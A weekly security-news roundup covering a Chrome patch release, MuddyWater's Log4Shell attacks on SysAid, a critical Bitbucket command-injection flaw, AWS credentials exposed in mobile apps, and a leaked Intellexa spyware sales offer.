Here are the most relevant headlines of the week, take note and keep informed of all the details:
Google’s latest security bulletin has fixed 24 vulnerabilities, including a critical flaw (CVE-2022-3038), and has added the sanitizer system to protect users from XSS injection attacks.
Most of the patched vulnerabilities were due to memory management issues, with use-after-free and buffer overflow flaws that impacted complements such as WebUI and Screen Capture.
Google has also corrected several security policies and incorrect implementation vulnerabilities.
There may not be evidence that these vulnerabilities are being actively exploited. Still, there is a severe unpatched vulnerability affecting the operative system clipboard through Chromium-based browsers, and it can be exploited with no authorization or interaction from the user.
Google also recommends installing the browser’s latest version to fix these flaws
Microsoft has published details of a recent investigation carried out in their Threat Intelligence Center (MSTIC): it informs of a wave of attacks by the MuddyWater (dubbed as Mercury by Microsoft) threat actor against targets in Israel.
This actor has been using the popular Log4shell vulnerability to compromise unpatched software. The attacks were mainly aimed at SysAid, an IT management program, instead of attacking WMware software as has been traditionally used in these attacks.
MuddyWater exploited the vulnerabilities as the initial point of entry into the victim’s system, in which they would then run web shells to execute different malicious commands, create users with admin privileges, steal credentials via Mimikatz, and move laterally via tools such as RemCom or Windows Management Instrumentation.
Microsoft recommendations to avoid these attacks: applying the patches for this set of vulnerabilities, already available since January 2022.
More info: https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/
Who warns? Atlassian to its users.
Vulnerability: a new critical one affecting the Bitbucket Server and Data Center software, which shall be patched immediately.
The flaw, CVE-2022-36804, has a CVSS v3 of 9.9 according to Atlassian, and it allows command injection through specially crafted HTTP requests, which opens the way for remote code execution.
Exploitation of vulnerability: it is not complex and does not require high privileges. The attacker would only need reading rights in public or private repositories and would never need to interact with the user.
Recommendations: Atlassian recommends closing public repositories temporarily for all users who cannot patch this issue now. Meanwhile:
Max Garret, the researcher who found this vulnerability and reported it to Atlassian, has promised to deliver a PoC in 30 days.
Detected by: Symantec’s Threat Hunting team
What? Nearly 2,000 mobile apps containing encrypted AWS (Amazon Web Services) credentials.
Most of the apps (1,856) correspond to the iOS system, while only 37 belong to Android.
77% of the apps have been confirmed to include valid AWS access tokens that could be used to directly access private cloud services.
In addition, those valid AWS tokens could be used by an attacker to access cloud instances where active service databases contain millions of records: user account details, internal communications, and other sensitive data.
Symantec’s research is intended to warn mobile app developers of the dangers of overreliance or insecure practices that expose AWS credentials, which could make the mobile app supply chain vulnerable, as well as open the door for malicious actors to private databases, leading to potential data breaches and exposure of end users’ personal data.
More info: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mobile-supply-chain-aws
A document property of Israeli-based company Intellexa has recently been leaked, uploaded on Twitter by VX-underground’s profile, it shows a commercial offer of a spyware for a price of 8 million euros.
The spyware works on iOS version 15.4.1 and Android version 12 and, since it is a 0-day, it is unlikely to be patched and not work on either of the new versions of these operating systems. This exploit allows remote access to the data of the impacted devices.
The infection attack vector would be a link that needs to be clicked to inject the payload into the device.
More info: https://www.securityweek.com/leaked-docs-show-spyware-firm-offering-ios-android-hacking-services-8-million?&web_view=true